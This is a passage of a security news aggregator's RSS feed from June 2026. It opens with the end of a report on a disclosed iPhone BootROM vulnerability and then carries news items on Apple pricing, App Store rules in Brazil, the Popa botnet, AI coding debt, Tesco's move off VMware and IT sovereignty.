<span data-contrast="auto">The team ultimately gained privileged EL1 execution within SecureROM code, enabling them to modify Device Firmware Update (DFU) mode, inject custom USB request handlers, and boot unsigned iBoot images.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">To preserve their changes, the <a href="https://ps.tc/pages/blog-usbliter8.html" target="_blank" rel="nofollow noopener">researchers</a> copied BootROM code into SRAM, modified memory mappings through the MMU, and forced devices back into DFU mode after restarting SecureROM.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The researchers concluded that the iPhone BootROM vulnerability demonstrates how subtle hardware flaws can undermine modern <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="28761">security</a> protections. Although newer Apple devices appear unaffected, vulnerable A12, A13, and Apple Watch models will remain exposed for their operational lifetime because the flaw exists within immutable BootROM and SecureROM code. The findings were disclosed to Apple's Product Security team before publication.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tim Cook Confirms Apple Will Raise Prices Due to Memory and Storage Costs]]></title>
<description><![CDATA[Outgoing CEO Tim Cook has confirmed to the Wall Street Journal that Apple is being forced to raise prices due to skyrocketing costs of memory and storage chips. What might that mean for your next Apple device purchase?]]></description>
<link>https://tsecurity.de/de/3609074/ios-mac-os/tim-cook-confirms-apple-will-raise-prices-due-to-memory-and-storage-costs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609074/ios-mac-os/tim-cook-confirms-apple-will-raise-prices-due-to-memory-and-storage-costs/</guid>
<pubDate>Fri, 19 Jun 2026 00:53:26 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Outgoing CEO Tim Cook has confirmed to the Wall Street Journal that Apple is being forced to raise prices due to skyrocketing costs of memory and storage chips. What might that mean for your next Apple device purchase?<p><a href="https://tidbits.com/2016/06/11/os-x-hidden-treasures-copy-and-paste/"><picture><source srcset="https://tidbits.com/uploads/2018/05/TB-Copy-Paste-ad-640x200.png" media="(max-width: 600px)" type="image/png"><img src="https://tidbits.com/uploads/2018/05/TB-Copy-Paste-ad-1456x180.png" srcset="https://tidbits.com/uploads/2018/05/TB-Copy-Paste-ad-1456x180.png 1456w, https://tidbits.com/uploads/2018/05/TB-Copy-Paste-ad-1456x180-640x79.png 640w" alt="macOS Hidden Treasures: Copy and Paste"></picture></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Announces Major App Store Changes on iOS in Brazil]]></title>
<description><![CDATA[Apple is allowing iPhone developers in Brazil to distribute apps through authorized alternative marketplaces and use third-party payment systems following action by the country's competition regulator. "In other words, developers in Brazil will be able to circumvent the App Store and Apple's in-a...]]></description>
<link>https://tsecurity.de/de/3608740/it-security-nachrichten/apple-announces-major-app-store-changes-on-ios-in-brazil/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608740/it-security-nachrichten/apple-announces-major-app-store-changes-on-ios-in-brazil/</guid>
<pubDate>Thu, 18 Jun 2026 21:08:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is allowing iPhone developers in Brazil to distribute apps through authorized alternative marketplaces and use third-party payment systems following action by the country's competition regulator. "In other words, developers in Brazil will be able to circumvent the App Store and Apple's in-app purchase system, but there are still fees," reports MacRumors. Apple will collect commissions ranging from 5% on externally distributed apps to as much as 26% for some App Store transactions using its payment system. From the report: Alternative app marketplaces will have to be authorized by Apple and will need to meet ongoing requirements. For apps that are still distributed through the App Store, developers will be able to include an alternative payment processing method in their app and/or link users to a website to complete a transaction. These changes are available on iOS 26.5 and later, and they are the result of regulatory action from Brazil's competition regulator. Apple has added a new page on its website with additional details for developers in Brazil.
 
Apple said these changes introduce privacy and security risks for users, including children. The company has introduced safeguards to mitigate these risks, including a notarization process for iOS apps, an authorization process for app marketplaces, and limitations on external links and alternative payments for users under the age of 18. Apple has already allowed alternative app stores and/or third-party payment systems on iOS in the EU, Japan, and South Korea, and it will likely be forced to do so in the UK and Australia too, due to similar regulations in those countries.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Apple+Announces+Major+App+Store+Changes+on+iOS+in+Brazil%3A+https%3A%2F%2Fapple.slashdot.org%2Fstory%2F26%2F06%2F18%2F1811250%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fapple.slashdot.org%2Fstory%2F26%2F06%2F18%2F1811250%2Fapple-announces-major-app-store-changes-on-ios-in-brazil%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://apple.slashdot.org/story/26/06/18/1811250/apple-announces-major-app-store-changes-on-ios-in-brazil?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Popa’ Botnet Linked to Publicly-Traded Israeli Firm]]></title>
<description><![CDATA[For the past four years, a sprawling Android-based botnet called Popa has forced millions of consumer TV boxes to relay Internet traffic linked to advertising fraud, account takeovers, and mass data-scraping efforts. This week, researchers from multiple security firms concluded…
Read more →
The p...]]></description>
<link>https://tsecurity.de/de/3608652/it-security-nachrichten/popa-botnet-linked-to-publicly-traded-israeli-firm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608652/it-security-nachrichten/popa-botnet-linked-to-publicly-traded-israeli-firm/</guid>
<pubDate>Thu, 18 Jun 2026 20:20:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>For the past four years, a sprawling Android-based botnet called Popa has forced millions of consumer TV boxes to relay Internet traffic linked to advertising fraud, account takeovers, and mass data-scraping efforts. This week, researchers from multiple security firms concluded…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/popa-botnet-linked-to-publicly-traded-israeli-firm/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/popa-botnet-linked-to-publicly-traded-israeli-firm/">‘Popa’ Botnet Linked to Publicly-Traded Israeli Firm</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Popa’ Botnet Linked to Publicly-Traded Israeli Firm]]></title>
<description><![CDATA[For the past four years, a sprawling Android-based botnet called Popa has forced millions of consumer TV boxes to relay Internet traffic linked to advertising fraud, account takeovers, and mass data-scraping efforts. This week, researchers from multiple security firms concluded that the Popa botn...]]></description>
<link>https://tsecurity.de/de/3608590/it-security-nachrichten/popa-botnet-linked-to-publicly-traded-israeli-firm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608590/it-security-nachrichten/popa-botnet-linked-to-publicly-traded-israeli-firm/</guid>
<pubDate>Thu, 18 Jun 2026 19:53:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[For the past four years, a sprawling Android-based botnet called Popa has forced millions of consumer TV boxes to relay Internet traffic linked to advertising fraud, account takeovers, and mass data-scraping efforts. This week, researchers from multiple security firms concluded that the Popa botnet is linked to NetNut, a "residential proxy" provider operated by the publicly-traded Israeli firm Alarum Technologies Ltd [NASDAQ: ALAR].]]></content:encoded>
</item>
<item>
<title><![CDATA['It’s a huge worry for business leaders': Report warns shadow AI could be causing major issues at businesses everywhere]]></title>
<description><![CDATA[Business travellers are desperate to use AI to help them prepare for trips, but they're being forced to use public chatbots.]]></description>
<link>https://tsecurity.de/de/3608044/it-nachrichten/its-a-huge-worry-for-business-leaders-report-warns-shadow-ai-could-be-causing-major-issues-at-businesses-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608044/it-nachrichten/its-a-huge-worry-for-business-leaders-report-warns-shadow-ai-could-be-causing-major-issues-at-businesses-everywhere/</guid>
<pubDate>Thu, 18 Jun 2026 16:18:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Business travellers are desperate to use AI to help them prepare for trips, but they're being forced to use public chatbots.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI coding debt is different]]></title>
<description><![CDATA[In hardware, when you ship something broken, the consequences are severe and often irreversible. That’s the world I worked in for years, in verification roles at Mellanox and later at Alibaba. The stakes forced the industry to build a rigorous verification culture. You proved designs worked befor...]]></description>
<link>https://tsecurity.de/de/3607187/ai-nachrichten/why-ai-coding-debt-is-different/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607187/ai-nachrichten/why-ai-coding-debt-is-different/</guid>
<pubDate>Thu, 18 Jun 2026 11:18:48 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In hardware, when you ship something broken, the consequences are severe and often irreversible. That’s the world I worked in for years, in verification roles at Mellanox and later at Alibaba. The stakes forced the industry to build a rigorous verification culture. You proved designs worked before they left the building.</p>



<p>In software, verification disciplines look like <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">CI/CD</a> pipelines, static analysis, canary deployments, and observability. But those systems were built around code written at human speed, with human comprehension baked into the process. AI code generation has broken that assumption. The writing process can no longer be trusted to carry institutional knowledge and judgment into the codebase. The industry is being pushed toward the kind of rigorous verification culture that hardware engineers have practiced for decades.</p>



<p>Enterprises are generating code faster than at any point in history. Google <a href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/cloud-next-2026-sundar-pichai/">recently disclosed</a> that 75% of the company’s new code is now AI-generated. Meta has set <a href="https://www.peoplematters.in/news/ai-and-emerging-tech/meta-sets-ai-coding-targets-with-some-teams-aiming-for-75percent-usage-49016">internal targets</a> requiring most of its engineers to generate the majority of their committed code with AI tools by mid-2026. The velocity gains are significant. But a growing body of evidence suggests the industry is accumulating a new form of technical debt, one that is less visible than the traditional kind and harder to unwind. It’s also preventable, and the organizations that get ahead of it will have a meaningful advantage over those that don’t.</p>



<h2 class="wp-block-heading">Understand what makes this debt different</h2>



<p>The standard narrative frames this as AI writing bad code. That’s not quite right. The more precise problem is cognitive debt: the loss of understanding of how and why software was built the way it was.</p>



<p>When a human writes code, something else happens alongside the typing. They simulate edge cases, reason through dependencies, and make judgment calls grounded in organizational context, including the business requirements behind a feature, the best practices the team has established, and the reasoning behind past architectural choices. That cognitive loop is how institutional knowledge gets built. When AI writes the code, you can get output that is syntactically correct, passes CI, ships cleanly, and leaves no one holding the mental model. The code works until something changes or breaks, and then the team is excavating a black box.</p>



<p>This is distinct from traditional technical debt, which is messy code. Cognitive debt is invisible code that functions but that nobody truly owns. And it compounds faster, because the same velocity that makes AI generation attractive is what prevents anyone from stopping to build the understanding that maintainability requires.</p>



<p><a href="https://www.gitclear.com/ai_assistant_code_quality_2025_research">GitClear’s analysis</a> of 211 million changed lines of code across major repositories found that during 2024, duplicate code blocks of five or more lines increased eightfold, while refactoring dropped from 25% to under 10% of all code changes. Refactoring is the slow, unglamorous work that keeps codebases healthy, and developers are doing far less of it.<a href="https://dora.dev/research/2024/dora-report/"> Google’s 2024 DORA report</a> found that a 25% increase in AI adoption correlates with a 7.2% decrease in delivery stability. DORA analysts note that the root cause isn’t flawed code per se; AI inflates batch sizes, and larger changesets have always been riskier to ship.</p>



<p>These findings aren’t indictments of AI-assisted development. They’re diagnostics, and they point toward a specific set of fixes.</p>



<h2 class="wp-block-heading">Close the context gap first</h2>



<p>In a <a href="https://www.qodo.ai/reports/state-of-ai-code-quality/">survey of 609 developers</a> we conducted last year, 65% said AI misses relevant context during critical tasks like refactoring, writing tests, or reviewing code. Context is the primary driver of AI code quality, and it’s where most enterprise organizations are underinvesting.</p>



<p>When an AI tool generates code without access to your organization’s architectural decisions, historical pull requests, security policies, or existing module patterns, you get solutions that are locally correct but globally incoherent. Closing that gap requires <a href="https://www.infoworld.com/article/4127462/what-is-context-engineering-and-why-its-the-new-ai-architecture.html" data-type="link" data-id="https://www.infoworld.com/article/4127462/what-is-context-engineering-and-why-its-the-new-ai-architecture.html">context engineering</a>: ensuring the tools and agents you use have access, at the right moment, to the right organizational knowledge, and the judgment to determine what is actually relevant for a given task. A <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html" data-type="link" data-id="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">retrieval system</a> that surfaces too much irrelevant context can degrade output quality as readily as one that surfaces too little. The specific tooling matters less than the discipline. Context infrastructure needs to be actively maintained, not indexed once and forgotten.</p>



<p>Build this infrastructure before you scale AI generation. Retrofitting is significantly harder. Treat it the way you treat your CI pipeline, as a prerequisite for safe production deployment.</p>



<p>Consider what happens when a team has built this context infrastructure well. Their code review tooling knows about a deprecated internal API, because that deprecation decision lives in months of past pull request discussions that have been indexed and surfaced. When generated code references the old API, the review flags it. Without that context layer, the same mistake gets waved through every time. That’s the kind of institutional knowledge that evaporates when humans stop writing every line of code, and that you have to actively work to preserve.</p>



<h2 class="wp-block-heading">Build a verification layer that matches your generation velocity</h2>



<p>Almost all of the investment in AI-assisted development has gone into generation. Very little has gone into verification. That imbalance is where the tech debt accumulates.</p>



<p>I think of these as the blue team and the red team. The blue team covers code generation, autocomplete, and agentic coding. It’s getting the headlines, the budgets, and the product launches. The red team covers integrity checks, behavior coverage, and alignment with organizational standards. In most organizations, it’s an afterthought. A CI pipeline catches obvious failures. A code review might happen, but reviewers are overwhelmed by the volume of AI-generated output and cannot meaningfully evaluate all of it. The result is code with a veneer of having been reviewed without anyone having actually understood it.</p>



<p>The <a href="https://hbr.org/2025/01/what-the-2024-crowdstrike-glitch-can-teach-us-about-cyber-risk">Crowdstrike outage of 2024</a> is worth keeping in mind here. AI didn’t generate the problematic code, but the incident illustrated what happens when a single software error propagates through production systems without sufficient verification. That exposure multiplies when code is being generated faster than humans can understand it.</p>



<p>A real verification layer means automated analysis that evaluates whether generated code aligns with your organization’s best practices, architectural standards, and compliance requirements. It means test coverage that reflects intended behavior, not only the happy path the AI chose to generate tests for. And it means traceability: a connection between the requirement and the implementation, so that six months from now, someone can understand what the code does and why it exists.</p>



<p>The numbers support investment here. In the <a href="https://www.qodo.ai/reports/state-of-ai-code-quality/">same developer survey</a>, teams that integrated AI into their code review workflow saw quality improvements in 81% of cases, compared to 55% for comparable teams without it. </p>



<h2 class="wp-block-heading">Make ownership non-negotiable</h2>



<p>Every piece of AI-generated code in production needs an accountable human who understands it well enough to maintain it. This is harder than it sounds, and it’s where most organizations are falling short.</p>



<p>The same velocity that makes AI generation attractive also creates pressure to skip the slow work of genuine comprehension. A developer reviews a 500-line pull request that an AI generated in three minutes and faces a real choice: spend two hours actually understanding it, or approve it because it looks right, passes the test, and “LGTM” (looks good to me). </p>



<p>Real ownership means slowing down generation velocity enough to allow for meaningful review, and being explicit with your team that this is the right trade-off. When that doesn’t happen, you’ve started building your next legacy system.</p>



<h2 class="wp-block-heading">What to do this quarter</h2>



<p>The good news is that none of this requires a multi-year transformation. The structural problems are real, but they have concrete solutions, and engineering leaders can make meaningful progress on all three fronts without waiting for the next budget cycle.</p>



<ul class="wp-block-list">
<li><strong>Audit your context infrastructure.</strong> If your AI tools are generating code without access to your organization’s architectural decisions, deprecated APIs, and security policies, fix that before expanding generation velocity further. The quality of context determines the quality of output.</li>



<li><strong>Invest in the red team.</strong> Establish an automated code quality and governance layer that evaluates generated code against your specific organizational standards, beyond functional correctness. This is a distinct investment from your code generation tooling and needs to be treated as such.</li>



<li><strong>Establish ownership explicitly.</strong> Every AI-generated feature in production should have a human owner who genuinely understands it. Make that a formal requirement.</li>
</ul>



<p>The organizations that get this right will find that AI generation becomes far more reliable once it has a verification layer underneath it. The ones that don’t will keep shipping faster while understanding their systems less, until the accumulated debt forces a reckoning. That’s a solvable problem. The question is whether you solve it now or later.</p>



<p><em>—</em></p>



<p><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tesco Moving 40,000 Server Workloads Off VMware Amid Broadcom's 'Abusive Conduct']]></title>
<description><![CDATA[An anonymous reader quotes a report from Ars Technica: Tesco, a retail conglomerate headquartered in the United Kingdom, is moving 40,000 server workloads off of VMware amid "abusive conduct" from Broadcom, recent legal filings claim. Tesco filed a lawsuit in the UK's High Court against Broadcom ...]]></description>
<link>https://tsecurity.de/de/3606579/it-security-nachrichten/tesco-moving-40000-server-workloads-off-vmware-amid-broadcoms-abusive-conduct/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606579/it-security-nachrichten/tesco-moving-40000-server-workloads-off-vmware-amid-broadcoms-abusive-conduct/</guid>
<pubDate>Thu, 18 Jun 2026 05:37:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Ars Technica: Tesco, a retail conglomerate headquartered in the United Kingdom, is moving 40,000 server workloads off of VMware amid "abusive conduct" from Broadcom, recent legal filings claim. Tesco filed a lawsuit in the UK's High Court against Broadcom alleging breach of contract last year. According to a September report from The Register, the lawsuit claimed that in January 2021, Tesco bought perpetual licenses for VMware's vSphere Foundation and Cloud Foundation, a subscription to VMware Tanzu, plus support services until 2026, with the option to extend support for four additional years.
 
But when Broadcom took over VMware in November 2023, it would not honor the deal and instead tried to get Tesco to pay "excessive and inflated prices for virtualization software for which Tesco has already paid" and would not allow it to buy support services for its perpetually licensed software without buying "duplicative subscription-based licenses for those same Software products," the initial complaint read, The Register reported at the time. Tesco, which reported 73.7 billion pounds (about $98.7 billion) in revenue in its fiscal year 2026, has since started migrating away from VMware and Broadcom's mainframe products, according to late-May court filings reported on by The Register today.
 
In January, Broadcom stopped supporting Tesco's VMware products, Tesco said, and Tesco has been paying for third-party support since. In its initial filing, Tesco also said that Broadcom refused to upgrade software or provide all security updates to customers without subscriptions. One of Tesco's recent filings, per The Register, reads: "Faced with Broadcom's abusive conduct, and given the criticality of virtualization and mainframe software and services to its business, Tesco has been forced to incur material costs to procure alternative solutions with reduced functionality, and to migrate to that software in a manner, and on a timeframe, that creates very significant risks to its business."
 
If it works "at exceptional pace," Tesco will be completely off VMware by the end of 2027 at the earliest. However, "the timeframe in which that migration must be undertaken has created and continues to create operational and commercial risk, and at material ongoing cost and disruption to the business," Tesco reportedly noted. Tesco is also dealing with migration challenges related to data security because its new, unnamed virtualization software is incompatible with the Veeam and Zerto products it uses. Tesco initially requested at least 100 million pounds (about $133.6 million) in damages each from Broadcom, VMware, and reseller Computacenter, plus interest. In its recent filings, Tesco said it turned down at least four offers from Broadcom to continue using VMware and Broadcom's mainframe tech. [...] The case is expected to go to court between November 1, 2027, and February 25, 2028, The Register reported. Afterward, it could go to trial. Further reading: HPE Tempts VMware Users, Partners With Year of Free Virtualization Software<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Tesco+Moving+40%2C000+Server+Workloads+Off+VMware+Amid+Broadcom's+'Abusive+Conduct'%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F17%2F2357242%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F17%2F2357242%2Ftesco-moving-40000-server-workloads-off-vmware-amid-broadcoms-abusive-conduct%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/06/17/2357242/tesco-moving-40000-server-workloads-off-vmware-amid-broadcoms-abusive-conduct?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Blink has a big speed advantage against WebKit in browser tests]]></title>
<description><![CDATA[WebKit has met its match, as the prototype Blink schools Apple's well-worn browser engine and hints at the future of web browsing on iOS.Logos for Chromium and WebKitWebKit, Apple's well-used browser rendering engine, has not had to deal with alternatives for quite some time. Even after the EU's ...]]></description>
<link>https://tsecurity.de/de/3605737/ios-mac-os/blink-has-a-big-speed-advantage-against-webkit-in-browser-tests/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605737/ios-mac-os/blink-has-a-big-speed-advantage-against-webkit-in-browser-tests/</guid>
<pubDate>Wed, 17 Jun 2026 19:55:29 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WebKit has met its match, as the prototype Blink schools Apple's well-worn browser engine and hints at the future of web browsing on <a href="https://appleinsider.com/inside/ios" title="iOS" data-kpt="1">iOS</a>.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67978-143305-chromewebkit-xl.jpg" alt="Large Chromium browser logo overlapping stacked rounded-square icons on a soft blue gradient background, suggesting web technology or browser-related concept" height="738"><br><span>Logos for Chromium and WebKit</span></div><br>WebKit, Apple's well-used browser rendering engine, has not had to deal with alternatives for quite some time. Even after the EU's Digital Markets Act changed the game and forced Apple to allow others to be used on iOS, via BrowserEngineKit.<br><br>However, a <a href="https://www.linkedin.com/pulse/test-drive-blink-ios-kyle-pflug-0nyxc/">LinkedIn post</a> from Microsoft Edge Web Platform Group Product Manager Kyle Pflug on June 15 indicates that a change is in progress. All based on a Chromium project using the Blink browser engine that dates back to <a href="https://appleinsider.com/articles/23/02/04/googles-chromium-team-work-on-non-webkit-browser-for-ios">February 2023</a>.<br><br><br> <a href="https://appleinsider.com/articles/26/06/17/blink-has-a-big-speed-advantage-against-webkit-in-browser-tests?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244684?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Top 10 Attack Surface Exposures in 2026]]></title>
<description><![CDATA[Breaches don't always start with a zero-day. An exposed admin panel can get brute-forced, or credentials reused from a previous attack. But when a vulnerability does drop — like MongoBleed earlier this year, which let attackers pull credentials and session tokens from server memory without authen...]]></description>
<link>https://tsecurity.de/de/3604541/it-security-nachrichten/the-top-10-attack-surface-exposures-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604541/it-security-nachrichten/the-top-10-attack-surface-exposures-in-2026/</guid>
<pubDate>Wed, 17 Jun 2026 13:09:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Breaches don't always start with a zero-day. An exposed admin panel can get brute-forced, or credentials reused from a previous attack. But when a vulnerability does drop — like MongoBleed earlier this year, which let attackers pull credentials and session tokens from server memory without authentication — anything internet-facing is immediately at risk.

With time-to-exploit now down to a]]></content:encoded>
</item>
<item>
<title><![CDATA[The Top 10 Attack Surface Exposures in 2026]]></title>
<description><![CDATA[Breaches don’t always start with a zero-day. An exposed admin panel can get brute-forced, or credentials reused from a previous attack. But when a vulnerability does drop — like MongoBleed earlier this year, which let attackers pull credentials and session…
Read more →
The post The Top 10 Attack ...]]></description>
<link>https://tsecurity.de/de/3604532/it-security-nachrichten/the-top-10-attack-surface-exposures-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604532/it-security-nachrichten/the-top-10-attack-surface-exposures-in-2026/</guid>
<pubDate>Wed, 17 Jun 2026 13:08:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Breaches don’t always start with a zero-day. An exposed admin panel can get brute-forced, or credentials reused from a previous attack. But when a vulnerability does drop — like MongoBleed earlier this year, which let attackers pull credentials and session…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-top-10-attack-surface-exposures-in-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-top-10-attack-surface-exposures-in-2026/">The Top 10 Attack Surface Exposures in 2026</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 things CIOs must do as sovereignty becomes a design constraint]]></title>
<description><![CDATA[For years, enterprise IT strategy operated on three assumptions: infrastructure could be global, vendors could be consolidated, and location had little impact on risk or compliance. That model is breaking down. As geopolitical tensions rise, AI regulation accelerates, and supply chains become mor...]]></description>
<link>https://tsecurity.de/de/3604351/it-security-nachrichten/5-things-cios-must-do-as-sovereignty-becomes-a-design-constraint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604351/it-security-nachrichten/5-things-cios-must-do-as-sovereignty-becomes-a-design-constraint/</guid>
<pubDate>Wed, 17 Jun 2026 12:08:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For years, enterprise IT strategy operated on three assumptions: infrastructure could be global, vendors could be consolidated, and location had little impact on risk or compliance. That model is breaking down. As geopolitical tensions rise, AI regulation accelerates, and supply chains become more fragile, CIOs are being forced to rethink not just where technology runs, but how it’s sourced, governed, and secured.</p>



<p>“Three years ago, sourcing decisions always started with total cost of ownership,” says Jochen Jaser, CIO of open-source software company SUSE. “But that’s not the dominant frame anymore. Now it starts more like a risk register.”</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="828" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Jochen Jaser, SUSE</p>
</figcaption></figure><p class="imageCredit">SUSE</p></div>



<p>That shift is reshaping enterprise architecture decisions at multiple levels. CIOs are reassessing dependence on hyperscalers, evaluating sovereign cloud options, and paying closer attention to where data resides and how it moves across jurisdictions. According to Shannon Bell, EVP, CIO, and CDO at enterprise information management company OpenText, “geopolitical risk has become a core architecture and sourcing consideration.”</p>



<p>The result is a more fragmented and complex operating environment. Gartner analyst Luis Pinto says organizations increasingly view geography as an architectural constraint rather than a secondary deployment issue, while Ron Babin, IDC advisor and professor at Toronto Metropolitan University, says CIOs must now navigate a growing patchwork of regional regulatory requirements.</p>



<p><a href="https://www.cio.com/article/4168673/can-an-ai-be-a-competent-leader-lets-find-out.html?utm=hybrid_search">As AI becomes more deeply embedded in enterprise operations</a>, the strategic importance of data itself is also changing. CIOs are paying closer attention not only to where data is stored, but how it’s accessed, moved, and protected across borders.</p>



<p>“The business transcends borders, but your data can’t always do the same,” says Matt Stern, CSO at Hypori, a secure mobile access provider.</p>



<p>Organizations aren’t abandoning global platforms, but they’re redesigning how they use them. As sovereignty becomes a permanent strategic constraint, here are five things CIOs must do in response.</p>



<h2 class="wp-block-heading">1. Treat geography as a core architectural decision</h2>



<p>The most fundamental change is conceptual since location is now a design variable rather than a deployment detail. For years, CIOs optimized for scale and efficiency, often centralizing workloads in a handful of hyperscale cloud environments. That approach assumed stable global access and predictable regulatory conditions. Today, those assumptions no longer hold.<br><br>“Where technology is located and who has operational control over it is now a major business risk,” Pinto says. Organizations are responding by paying closer attention to data residency and access rights.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Luis Pinto, Gartner</p>
</figcaption></figure><p class="imageCredit">Gartner</p></div>



<p>Jaser adds that the shift is forcing organizations to rethink even <a href="https://www.cio.com/article/4107377/cios-will-underestimate-ai-infrastructure-costs-by-30.html?utm=hybrid_search">basic infrastructure assumptions</a>. “Usually you’d just go with AWS, Google, and on-prem,” he says. “But now as digital sovereignty requirements are coming into space, we need to look for sovereign cloud offerings.”</p>



<p>That doesn’t mean abandoning hyperscalers entirely. SUSE itself operates a hybrid infrastructure spanning commercial clouds and its own data centers. Instead, Jaser says organizations are becoming more selective about workload placement, evaluating which systems require stronger sovereignty protections, and which can remain in global environments.</p>



